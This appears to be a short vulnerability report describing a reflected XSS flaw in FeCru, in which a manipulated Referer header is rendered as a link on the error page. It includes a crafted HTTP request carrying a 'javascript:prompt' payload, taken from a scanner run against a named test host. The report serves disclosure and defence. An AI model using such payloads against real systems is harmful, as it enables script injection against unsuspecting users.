If the referrer header is manipulated and an error condition is triggered, the user will be displayed the error page in FeCru, which includes the manipulated referrer value on the page as a link. The use of the referrer header value directly as the target of a hyperlink can result in the user unknowingly executing code on the target system.

Reproducing this condition can be accomplished using a crafted request such as as the one below:

GET /download/ HTTP/1.1
X-AUSERNAME: gsrobert
Referer: javascript:prompt(936711);
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Host: crucible-test.ksc.nasa.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Acunetix-Product: WVS/9.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED